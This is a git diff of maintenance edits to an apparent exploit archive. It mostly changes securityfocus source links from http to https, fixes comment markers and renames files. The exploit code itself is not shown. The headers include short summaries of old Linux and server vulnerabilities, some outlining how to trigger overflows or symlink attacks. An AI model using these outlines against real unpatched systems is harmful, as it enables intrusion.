diff --git a/exploits/linux/local/33576.txt b/exploits/linux/local/33576.txt index 278344003..0c6e8450f 100644 --- a/exploits/linux/local/33576.txt +++ b/exploits/linux/local/33576.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37996/info +source: https://www.securityfocus.com/bid/37996/info Battery Life Toolkit (BLTK) is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/33604.sh b/exploits/linux/local/33604.sh index 42c0bf8b3..252299c54 100755 --- a/exploits/linux/local/33604.sh +++ b/exploits/linux/local/33604.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38120/info +source: https://www.securityfocus.com/bid/38120/info SystemTap is prone to multiple local memory-corruption vulnerabilities. diff --git a/exploits/linux/local/33623.txt b/exploits/linux/local/33623.txt index 3207b7492..c64d01beb 100644 --- a/exploits/linux/local/33623.txt +++ b/exploits/linux/local/33623.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38176/info +source: https://www.securityfocus.com/bid/38176/info Accellion File Transfer Appliance is prone to multiple remote vulnerabilities, including: diff --git a/exploits/linux/local/33963.txt b/exploits/linux/local/33963.txt index 94187107e..af90e9a0d 100644 --- a/exploits/linux/local/33963.txt +++ b/exploits/linux/local/33963.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40005/info +source: https://www.securityfocus.com/bid/40005/info gdomap is prone to multiple local information-disclosure vulnerabilities. diff --git a/exploits/linux/local/34001.c b/exploits/linux/local/34001.c index dda633549..d0b4f820f 100644 --- a/exploits/linux/local/34001.c +++ b/exploits/linux/local/34001.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/40241/info +source: https://www.securityfocus.com/bid/40241/info The Linux Kernel is prone to a security-bypass vulnerability that affects the Btrfs filesystem implementation. 
diff --git a/exploits/linux/local/34267.sh b/exploits/linux/local/34267.sh index b740300d6..157af53dc 100755 --- a/exploits/linux/local/34267.sh +++ b/exploits/linux/local/34267.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41449/info +source: https://www.securityfocus.com/bid/41449/info Altair Engineering PBS Pro creates temporary files in an insecure manner. diff --git a/exploits/linux/local/34537.txt b/exploits/linux/local/34537.txt index 3fa321528..1be504b35 100644 --- a/exploits/linux/local/34537.txt +++ b/exploits/linux/local/34537.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/42779/info +source: https://www.securityfocus.com/bid/42779/info EncFS is prone to design errors in its cryptographic implementation. diff --git a/exploits/linux/local/34987.c b/exploits/linux/local/34987.c index bc3d9dd61..ef624496e 100644 --- a/exploits/linux/local/34987.c +++ b/exploits/linux/local/34987.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/44758/info +source: https://www.securityfocus.com/bid/44758/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/35681.txt b/exploits/linux/local/35681.txt index 40a68c7c8..e06929433 100644 --- a/exploits/linux/local/35681.txt +++ b/exploits/linux/local/35681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47652/info +source: https://www.securityfocus.com/bid/47652/info OProfile is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36257.txt b/exploits/linux/local/36257.txt index e679c5cc4..d51bc1238 100644 --- a/exploits/linux/local/36257.txt +++ b/exploits/linux/local/36257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50380/info +source: https://www.securityfocus.com/bid/50380/info Trendmicro IWSS is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36294.c b/exploits/linux/local/36294.c index eca952d20..cde338425 100644 
--- a/exploits/linux/local/36294.c +++ b/exploits/linux/local/36294.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/50573/info +source: https://www.securityfocus.com/bid/50573/info The Linux kernel is prone to a local information-disclosure weakness. diff --git a/exploits/linux/local/36430.sh b/exploits/linux/local/36430.sh index 3f4699d60..631139975 100755 --- a/exploits/linux/local/36430.sh +++ b/exploits/linux/local/36430.sh @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/50982/info +source: https://www.securityfocus.com/bid/50982/info HP Application Lifestyle Management is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/36571.sh b/exploits/linux/local/36571.sh index 3729f2c49..47b794319 100755 --- a/exploits/linux/local/36571.sh +++ b/exploits/linux/local/36571.sh @@ -1,4 +1,4 @@ -#source: http://www.securityfocus.com/bid/51529/info +#source: https://www.securityfocus.com/bid/51529/info #OverlayFS is prone to a local security-bypass vulnerability. diff --git a/exploits/linux/local/36887.py b/exploits/linux/local/36887.py index 9a4ab281a..4113707b3 100755 --- a/exploits/linux/local/36887.py +++ b/exploits/linux/local/36887.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52206/info +source: https://www.securityfocus.com/bid/52206/info GNOME NetworkManager is prone to a local arbitrary file-access vulnerability. diff --git a/exploits/linux/local/36966.txt b/exploits/linux/local/36966.txt index 71b812855..91aaac713 100644 --- a/exploits/linux/local/36966.txt +++ b/exploits/linux/local/36966.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/52452/info +source: https://www.securityfocus.com/bid/52452/info Light Display Manager (LightDM) is prone to a local arbitrary-file-deletion vulnerability. diff --git a/exploits/linux/local/37183.c b/exploits/linux/local/37183.c index bc9513494..5d38996dd 100644 --- a/exploits/linux/local/37183.c +++ b/exploits/linux/local/37183.c 
@@ -1,3 +1,4 @@ +/* # Exploit Title: PonyOS <= 3.0 tty ioctl() local kernel exploit # Google Dork: [if applicable] # Date: 29th June 2015 @@ -9,6 +10,7 @@ # CVE : N/A # Source: https://raw.githubusercontent.com/HackerFantastic/Public/master/exploits/applejack.c +*/ /* PonyOS <= 3.0 tty ioctl() root exploit ======================================== diff --git a/exploits/linux/local/37543.c b/exploits/linux/local/37543.c index 474809497..d4d722cbe 100644 --- a/exploits/linux/local/37543.c +++ b/exploits/linux/local/37543.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/54702/info +source: https://www.securityfocus.com/bid/54702/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/37631.c b/exploits/linux/local/37631.c index bb9e245b3..15605fa58 100644 --- a/exploits/linux/local/37631.c +++ b/exploits/linux/local/37631.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/54982/info +// source: https://www.securityfocus.com/bid/54982/info GNU glibc is prone to multiple stack-based buffer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data. diff --git a/exploits/linux/local/37898.py b/exploits/linux/local/37898.py index 62f26f8d6..56d55ad85 100755 --- a/exploits/linux/local/37898.py +++ b/exploits/linux/local/37898.py @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/55725/info +source: https://www.securityfocus.com/bid/55725/info Reaver Pro is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/37937.c b/exploits/linux/local/37937.c index 3c4690fd6..6e7ae732c 100644 --- a/exploits/linux/local/37937.c +++ b/exploits/linux/local/37937.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/55855/info +source: https://www.securityfocus.com/bid/55855/info The Linux kernel is prone to a local information-disclosure vulnerability. 
diff --git a/exploits/linux/local/38232.txt b/exploits/linux/local/38232.txt index 1df4887fc..81f219670 100644 --- a/exploits/linux/local/38232.txt +++ b/exploits/linux/local/38232.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57492/info +source: https://www.securityfocus.com/bid/57492/info GNU Coreutils is prone to a buffer-overflow vulnerability because it fails to properly bounds check user-supplied input. diff --git a/exploits/linux/local/38298.txt b/exploits/linux/local/38298.txt index 38b3c4149..400e1c59e 100644 --- a/exploits/linux/local/38298.txt +++ b/exploits/linux/local/38298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/57784/info +source: https://www.securityfocus.com/bid/57784/info xNBD is prone to a vulnerability because it handles temporary files in an insecure manner. diff --git a/exploits/linux/local/38357.c b/exploits/linux/local/38357.c index d588c8e61..5dba49970 100644 --- a/exploits/linux/local/38357.c +++ b/exploits/linux/local/38357.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/58292/info +// source: https://www.securityfocus.com/bid/58292/info rpi-update is prone to an insecure temporary file-handling vulnerability and a security-bypass vulnerability diff --git a/exploits/linux/local/38390.c b/exploits/linux/local/38390.c index 16cc62fb2..d24717fcd 100644 --- a/exploits/linux/local/38390.c +++ b/exploits/linux/local/38390.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/58478/info +source: https://www.securityfocus.com/bid/58478/info Linux kernel is prone to a local privilege-escalation vulnerability. diff --git a/exploits/linux/local/38559.txt b/exploits/linux/local/38559.txt index eb9956cae..97d9d8dd4 100644 --- a/exploits/linux/local/38559.txt +++ b/exploits/linux/local/38559.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/60410/info +source: https://www.securityfocus.com/bid/60410/info Linux kernel is prone to a local privilege-escalation vulnerability. 
diff --git a/exploits/linux/local/38817.txt b/exploits/linux/local/38817.txt index e63b2324d..0fdf422cb 100644 --- a/exploits/linux/local/38817.txt +++ b/exploits/linux/local/38817.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/63374/info +source: https://www.securityfocus.com/bid/63374/info Poppler is prone to a local format-string vulnerability because it fails to sanitize user-supplied input. diff --git a/exploits/linux/local/38937.txt b/exploits/linux/local/38937.txt index 4ce58e9d1..3d1e4a359 100644 --- a/exploits/linux/local/38937.txt +++ b/exploits/linux/local/38937.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/64617/info +source: https://www.securityfocus.com/bid/64617/info Apache Libcloud is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/39207.txt b/exploits/linux/local/39207.txt index 73f2baa30..e41c42f8d 100644 --- a/exploits/linux/local/39207.txt +++ b/exploits/linux/local/39207.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/67727/info +source: https://www.securityfocus.com/bid/67727/info dpkg is prone to multiple directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/linux/local/39214.c b/exploits/linux/local/39214.c index 62981d568..98d5fa7c1 100644 --- a/exploits/linux/local/39214.c +++ b/exploits/linux/local/39214.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/68048/info +source: https://www.securityfocus.com/bid/68048/info The Linux kernel is prone to a local information-disclosure vulnerability. diff --git a/exploits/linux/local/41171.txt b/exploits/linux/local/41171.txt index e97805399..bb5e1f77c 100644 --- a/exploits/linux/local/41171.txt +++ b/exploits/linux/local/41171.txt 
@@ -1,4 +1,5 @@ -Source: http://www.openwall.com/lists/oss-security/2017/01/24/4 +/* +source: http://www.openwall.com/lists/oss-security/2017/01/24/4 This is a heads up for a trivial systemd local root exploit, that was silently fixed in the upstream git as: @@ -46,7 +47,7 @@ to spot potential issues. The systemd git log is really huge, with lots of commits each week ("new services as a service"). Sebastian - +*/ diff --git a/exploits/linux/local/438.c b/exploits/linux/local/438.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/438.c rename to exploits/linux/local/438.sh diff --git a/exploits/linux/local/469.c b/exploits/linux/local/469.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/469.c rename to exploits/linux/local/469.sh diff --git a/exploits/linux/local/75.c b/exploits/linux/local/75.sh old mode 100644 new mode 100755 similarity index 100% rename from exploits/linux/local/75.c rename to exploits/linux/local/75.sh diff --git a/exploits/linux/local/9208.txt b/exploits/linux/local/9208.txt index 4f905e8ec..488c17f35 100644 --- a/exploits/linux/local/9208.txt +++ b/exploits/linux/local/9208.txt @@ -1,5 +1,5 @@ PulseAudio setuid Local Privilege Escalation Vulnerability -http://www.securityfocus.com/bid/35721 +https://www.securityfocus.com/bid/35721 Credit for discovery of bug: Tavis Ormandy, Julien Tinnes and Yorick Koster -- diff --git a/exploits/linux/local/9595.c b/exploits/linux/local/9595.c index 39d1905bc..17286fc19 100644 --- a/exploits/linux/local/9595.c +++ b/exploits/linux/local/9595.c @@ -1,7 +1,7 @@ /* HTMLDOC 'html' File Handling Remote Stack Buffer Overflow Exploit (Linux) -Reference: http://www.securityfocus.com/bid/35727 +Reference: https://www.securityfocus.com/bid/35727 Tested on HTMLDOC 1.8.27 on Debian 5.0 (+ASLR) Credit: ANTHRAX666 for finding the vulnerability 
diff --git a/exploits/linux/remote/1232.c b/exploits/linux/remote/1232.c index f8a7afcd6..556658a8b 100644 --- a/exploits/linux/remote/1232.c +++ b/exploits/linux/remote/1232.c @@ -1,4 +1,4 @@ - /* +/* ***************************************************************************************************************** $ An open security advisory #13 - RealPlayer and Helix Player Remote Format String Exploit ***************************************************************************************************************** diff --git a/exploits/linux/remote/1717.c b/exploits/linux/remote/1717.c index 0125b7c94..eee68f169 100644 --- a/exploits/linux/remote/1717.c +++ b/exploits/linux/remote/1717.c @@ -4,7 +4,7 @@ author : c0d3r "kaveh razavi" c0d3r@ihsteam.com package : fenice-1.10.tar.gz and prolly prior versions workaround : update after patch release - advisory : http://www.securityfocus.com/bid/17678 + advisory : https://www.securityfocus.com/bid/17678 company address : http://streaming.polito.it/server timeline : 23 Apr 2006 : vulnerability reported by Luigi Auriemma diff --git a/exploits/linux/remote/18761.rb b/exploits/linux/remote/18761.rb index a644fddb4..bd7ff3882 100755 --- a/exploits/linux/remote/18761.rb +++ b/exploits/linux/remote/18761.rb @@ -35,7 +35,7 @@ class Metasploit3 < Msf::Exploit::Remote ['CVE', '2008-5499'], ['OSVDB', '50796'], ['URL', 'http://www.adobe.com/support/security/bulletins/apsb08-24.html'], - ['URL', 'http://www.securityfocus.com/bid/32896/exploit'] + ['URL', 'https://www.securityfocus.com/bid/32896/exploit'] ], 'DefaultOptions' => { diff --git a/exploits/linux/remote/19069.txt b/exploits/linux/remote/19069.txt index c8e8ddf95..e9136a853 100644 --- a/exploits/linux/remote/19069.txt +++ b/exploits/linux/remote/19069.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/75/info +source: https://www.securityfocus.com/bid/75/info There appears to be a buffer overflow in Qualcomm's Eudora Internet Mail Server. If you connect to its TCP port number 106 and issue the USER command followed by a string over than a thousand bytes in length the server will crash possibly taking down the machine with it. diff --git a/exploits/linux/remote/19079.c b/exploits/linux/remote/19079.c index fec0b0a65..55f7dc792 100644 --- a/exploits/linux/remote/19079.c +++ b/exploits/linux/remote/19079.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/90/info +// source: https://www.securityfocus.com/bid/90/info The Quake server has a feature where it allows administrators to remotely send commands to the Quake console with a password. However, it is possible to remotely bypass authentication. diff --git a/exploits/linux/remote/19086.c b/exploits/linux/remote/19086.c index 165f31178..561140ced 100644 --- a/exploits/linux/remote/19086.c +++ b/exploits/linux/remote/19086.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/113/info +source: https://www.securityfocus.com/bid/113/info There is a vulnerability in ProFTPD versions 1.2.0pre1 and earlier and in wu-ftpd 2.4.2 (beta 18) VR9 and earlier. This vulnerability is a buffer overflow triggered by unusually long path names (directory structures). For example, if a user has write privilages he or she may create an unusually long pathname which due to insuficient bounds checking in ProFTPD will overwrite the stack. This will allow the attacker to insert their own instruction set on the stack to be excuted thereby elavating their access. diff --git a/exploits/linux/remote/19087.c b/exploits/linux/remote/19087.c index c2fb5d814..19977c3a4 100644 --- a/exploits/linux/remote/19087.c +++ b/exploits/linux/remote/19087.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/113/info +source: https://www.securityfocus.com/bid/113/info There is a vulnerability in ProFTPD versions 1.2.0pre1 and earlier and in wu-ftpd 2.4.2 (beta 18) VR9 and earlier. This vulnerability is a buffer overflow triggered by unusually long path names (directory structures). For example, if a user has write privilages he or she may create an unusually long pathname which due to insuficient bounds checking in ProFTPD will overwrite the stack. This will allow the attacker to insert their own instruction set on the stack to be excuted thereby elavating their access. diff --git a/exploits/linux/remote/19096.c b/exploits/linux/remote/19096.c index 7df78d15f..ba9dafad5 100644 --- a/exploits/linux/remote/19096.c +++ b/exploits/linux/remote/19096.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/121/info +// source: https://www.securityfocus.com/bid/121/info NFS servers running certain implementations of mountd, primarily Linux systems. On some systems, the vulnerable NFS server is enabled by default. This vulnerability can be exploited even if the NFS server does not share any file systems. diff --git a/exploits/linux/remote/19104.c b/exploits/linux/remote/19104.c index e14a3194b..3d4b78211 100644 --- a/exploits/linux/remote/19104.c +++ b/exploits/linux/remote/19104.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/127/info +source: https://www.securityfocus.com/bid/127/info Statd is the RPC NFS status daemon. It is used to communicate status information to other services or host. diff --git a/exploits/linux/remote/19105.c b/exploits/linux/remote/19105.c index be88e1d41..258a9a9d1 100644 --- a/exploits/linux/remote/19105.c +++ b/exploits/linux/remote/19105.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/128/info +// source: https://www.securityfocus.com/bid/128/info Wwwcount (count.cgi) is a very popular CGI program used to track website usage. In particular, it enumerates the number of hits on given webpages and increments them on a 'counter'. In October of 1997 two remotely exploitable problems were discovered with this program. The first problem was somewhat innocuous in that it only allowed remote users to view .GIF files they were not supposed to have access to. This may be dangerous if the site contains sensitive data in .GIF files such as demographic/financial data in charts etc. diff --git a/exploits/linux/remote/19107.c b/exploits/linux/remote/19107.c index 7be516051..c11ac1d45 100644 --- a/exploits/linux/remote/19107.c +++ b/exploits/linux/remote/19107.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/130/info +// source: https://www.securityfocus.com/bid/130/info A vulnerability exists in certain imapd implementations that allow an attacker to execute arbitrary code remotely. In certain instances, the code to be executed will be run with root privilege. diff --git a/exploits/linux/remote/19109.c b/exploits/linux/remote/19109.c index e058e10bb..ce9d859cb 100644 --- a/exploits/linux/remote/19109.c +++ b/exploits/linux/remote/19109.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/133/info +// source: https://www.securityfocus.com/bid/133/info A number of buffer-overflow issues reside in versions prior to 2.5 of Qualcomm's 'qpopper' program. Exploiting this issue allows a remote attacker to execute arbitrary commands on hosts that are running a vulnerable version. diff --git a/exploits/linux/remote/19111.c b/exploits/linux/remote/19111.c index 97f5fc39d..ff73d7ae4 100644 --- a/exploits/linux/remote/19111.c +++ b/exploits/linux/remote/19111.c 
@@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/134/info +source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. diff --git a/exploits/linux/remote/19112.c b/exploits/linux/remote/19112.c index 69873a6c0..1f1906100 100644 --- a/exploits/linux/remote/19112.c +++ b/exploits/linux/remote/19112.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/134/info +source: https://www.securityfocus.com/bid/134/info A buffer overflow exists in certain versions of BIND, the nameserver daemon currently maintained by the Internet Software Consortium (ISC). BIND fails to properly bound the data recieved when processing an inverse query. Upon a memory copy, portions of the program can be overwritten, and arbitrary commands run on the affected host. diff --git a/exploits/linux/remote/19119.c b/exploits/linux/remote/19119.c index 49931caab..eb51e5775 100644 --- a/exploits/linux/remote/19119.c +++ b/exploits/linux/remote/19119.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/150/info +source: https://www.securityfocus.com/bid/150/info A number of vulnerabilities exist in Hewlett Packard's rlpdaemon under HPUX 9.x and 10.x. These vulnerabilities may allow for a remote attacker to access the system under the lp user account, as well as execute arbitrary commands remotely, also as user lp. diff --git a/exploits/linux/remote/19123.c b/exploits/linux/remote/19123.c index 19c8b19d1..a0fac16f6 100644 --- a/exploits/linux/remote/19123.c +++ b/exploits/linux/remote/19123.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/156/info +// source: https://www.securityfocus.com/bid/156/info A buffer overflow exists in the pop server shipped with Santa Cruz Operation, Inc's (SCO) Open Server. By presenting a buffer of sufficient length to the pop server, an attacker can overwrite the return address on the stack, and execute arbitrary code upon a return. SCO's pop server is based on Qualcomm's pop daemon, and this vulnerability is similar to others present in Qualcomm's server. diff --git a/exploits/linux/remote/19124.txt b/exploits/linux/remote/19124.txt index 1d4cc87d9..bd47dc5d1 100644 --- a/exploits/linux/remote/19124.txt +++ b/exploits/linux/remote/19124.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/157/info +source: https://www.securityfocus.com/bid/157/info A vulnerability exists in HP's JetAdmin Rev. D.01.09 software. Due to its failure to check if it is following a symbolic link, it is possible for an attacker to create a link from /tmp/jetadmin.log to anywhere on the filesystem, with permissions for reading and writing by everyone on the system. This can be used to gain root access. diff --git a/exploits/linux/remote/19218.c b/exploits/linux/remote/19218.c index e5cb70f42..ad5c8f365 100644 --- a/exploits/linux/remote/19218.c +++ b/exploits/linux/remote/19218.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/269/info +// source: https://www.securityfocus.com/bid/269/info The Serv-U FTP server versions 2.5 and earlier are vulnerable to multiple buffer overflows. This can result in a denial of service and at worst in arbitrary code being executed on the system. diff --git a/exploits/linux/remote/19219.c b/exploits/linux/remote/19219.c index 314aa25b5..e9c9987ee 100644 --- a/exploits/linux/remote/19219.c +++ b/exploits/linux/remote/19219.c 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/271/info +// source: https://www.securityfocus.com/bid/271/info Multiple vulnerabilities in the BisonWare FTP Server can cause denials of service. diff --git a/exploits/linux/remote/19226.c b/exploits/linux/remote/19226.c index 6aee495e8..5d92bffaf 100644 --- a/exploits/linux/remote/19226.c +++ b/exploits/linux/remote/19226.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/283/info +// source: https://www.securityfocus.com/bid/283/info A buffer overflow vulnerability in pop2d version 4.4 or earlier allow malicious remote users to obtain access to the "nobody" user account. diff --git a/exploits/linux/remote/19247.c b/exploits/linux/remote/19247.c index 5a4b94130..9adaa1de2 100644 --- a/exploits/linux/remote/19247.c +++ b/exploits/linux/remote/19247.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/307/info +// source: https://www.securityfocus.com/bid/307/info Microsoft IIS reported prone to a buffer overflow vulnerability in the way IIS handles requests for several file types that require server side processing. This vulnerability may allow a remote attacker to execute arbitrary code on the target machine. diff --git a/exploits/linux/remote/19251.c b/exploits/linux/remote/19251.c index c41a31482..c8d0fa550 100644 --- a/exploits/linux/remote/19251.c +++ b/exploits/linux/remote/19251.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/313/info +// source: https://www.securityfocus.com/bid/313/info A vulnerability in tcpdump causes it to enter an infinite loop within the procedure ip_print() from the file print_ip.c when it receives a packet with IP protocol number four and a zero header length and it tries to print it. This may allow remote malicious users to evade network monitoring. diff --git a/exploits/linux/remote/19253.txt b/exploits/linux/remote/19253.txt index b5d5bf1ce..c647de93c 100644 --- a/exploits/linux/remote/19253.txt +++ b/exploits/linux/remote/19253.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/318/info +source: https://www.securityfocus.com/bid/318/info The Debian GNU/Linux 2.1 apache package by default allows anyone to view /usr/doc via the web, remotely. This is because srm.conf is preconfigured with the line: diff --git a/exploits/linux/remote/19297.c b/exploits/linux/remote/19297.c index ad697dcbc..a193c2d3e 100644 --- a/exploits/linux/remote/19297.c +++ b/exploits/linux/remote/19297.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/371/info +source: https://www.securityfocus.com/bid/371/info There is a vulnerability in the System Data Repository (SDR) subsystem. The SDR subsystem is used in IBM SP multi-machine parallel processing environments typically associated with Super Computing. The SDR is deisgned to allow multiple machines to share configuration and operational information. However, proper authentication is not in place in the SDR daemon 'sdrd', this allows un-authenticated users to arbitrarily pull any file off SDR hosts. */ diff --git a/exploits/linux/remote/19458.c b/exploits/linux/remote/19458.c index 53baac26b..6fda28368 100644 --- a/exploits/linux/remote/19458.c +++ b/exploits/linux/remote/19458.c @@ -1,5 +1,5 @@ /* -source: http://www.securityfocus.com/bid/580/info +source: https://www.securityfocus.com/bid/580/info Certain Linux kernels in the 2.0.3x range are susceptible to blind TCP spoofing attacks due to the way that the kernel handles invalid ack sequence numbers, and the way it assigns IDs to outgoing IP datagrams. For this vulnerability to be effective, 3 conditions have to be met: The spoofed machine must be off the network or incapable of sending data out/recieving data properly, the target machine must not be communicating actively with any other machines at the time, and no packets between the attacker's machine and the target can be dropped during the attack. 
diff --git a/exploits/linux/remote/19475.c b/exploits/linux/remote/19475.c index 30ef7e3f1..7ba8b0cdd 100644 --- a/exploits/linux/remote/19475.c +++ b/exploits/linux/remote/19475.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/612/info +// source: https://www.securityfocus.com/bid/612/info The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c. The vulnerability in 1.2pre4 is a mkdir overflow. The name of the created path can not exceed 255 chars. diff --git a/exploits/linux/remote/19476.c b/exploits/linux/remote/19476.c index 0efb7fe3f..dd2e81293 100644 --- a/exploits/linux/remote/19476.c +++ b/exploits/linux/remote/19476.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/612/info +// source: https://www.securityfocus.com/bid/612/info The vulnerability in 1.2pre1, 1.2pre3 and 1.2pre3 is a remotely exploitable buffer overflow, the result of a sprintf() in the log_xfer() routine in src/log.c. The vulnerability in 1.2pre4 is a mkdir overflow. The name of the created path can not exceed 255 chars. diff --git a/exploits/linux/remote/19503.txt b/exploits/linux/remote/19503.txt index 33a07a0a6..46ff910d1 100644 --- a/exploits/linux/remote/19503.txt +++ b/exploits/linux/remote/19503.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/650/info +source: https://www.securityfocus.com/bid/650/info Lack of user input validation in ProFTPD can lead to a remote root vulnerability. diff --git a/exploits/linux/remote/19522.txt b/exploits/linux/remote/19522.txt index d88120527..3562eafd7 100644 --- a/exploits/linux/remote/19522.txt +++ b/exploits/linux/remote/19522.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/670/info +source: https://www.securityfocus.com/bid/670/info A vulnerability in the Linux kernel allows remote users to guess the initial sequence number of TCP sessions. This can be used to create spoofed TCP sessions bypassing some types of IP based access controls. diff --git a/exploits/linux/remote/19557.txt b/exploits/linux/remote/19557.txt index 5c6e99a18..bb1b5cea8 100644 --- a/exploits/linux/remote/19557.txt +++ b/exploits/linux/remote/19557.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/719/info +source: https://www.securityfocus.com/bid/719/info AnyForm is a popular form CGI designed to support simple forms that deliver responses via email. Certain versions of AnyForm did not perform user supplied data sanity checking and could be exploited by remote intruders to execute arbitrary commands. These commands were issued as the UID which the web server runs as, typically 'nobody'. diff --git a/exploits/linux/remote/19558.c b/exploits/linux/remote/19558.c index 1d19ec6a9..ff831f458 100644 --- a/exploits/linux/remote/19558.c +++ b/exploits/linux/remote/19558.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/720/info +// source: https://www.securityfocus.com/bid/720/info Both the Unix and WindowsNT versions of OpenLink 3.2 are vulnerable to a remotely exploitable buffer overflow attack. The problem is in their web configuration utility, and is the result of an unchecked strcpy() call. The consequence is the execution of arbitrary code on the target host (running the configuration utility) with the priviliges of the web software. diff --git a/exploits/linux/remote/19567.txt b/exploits/linux/remote/19567.txt index 089e69f63..3e5981337 100644 --- a/exploits/linux/remote/19567.txt +++ b/exploits/linux/remote/19567.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/741/info +source: https://www.securityfocus.com/bid/741/info There is a vulnerability present in certain versions of the Squid Web Proxy Cache developed by the National Science Foundation. This problem is only in effect when users of the cache are using an external authenticator. diff --git a/exploits/linux/remote/19634.c b/exploits/linux/remote/19634.c index 5d8077164..688e28dce 100644 --- a/exploits/linux/remote/19634.c +++ b/exploits/linux/remote/19634.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/808/info +// source: https://www.securityfocus.com/bid/808/info The Delegate proxy server from ElectroTechnical Laboratory has numerous (several hundred, according to the orignal poster) unchecked buffers that could be exploited to remotely compromise the server. diff --git a/exploits/linux/remote/19729.c b/exploits/linux/remote/19729.c index d9fa3c487..653282497 100644 --- a/exploits/linux/remote/19729.c +++ b/exploits/linux/remote/19729.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/948/info +// source: https://www.securityfocus.com/bid/948/info A remotely exploitable buffer-overflow vulnerability affects Qualcomm's 'qpopper' daemon. This issue allows users already in possession of a username and password for a POP account to compromise the server running the qpopper daemon. diff --git a/exploits/linux/remote/19801.c b/exploits/linux/remote/19801.c index 513563100..082436671 100644 --- a/exploits/linux/remote/19801.c +++ b/exploits/linux/remote/19801.c 
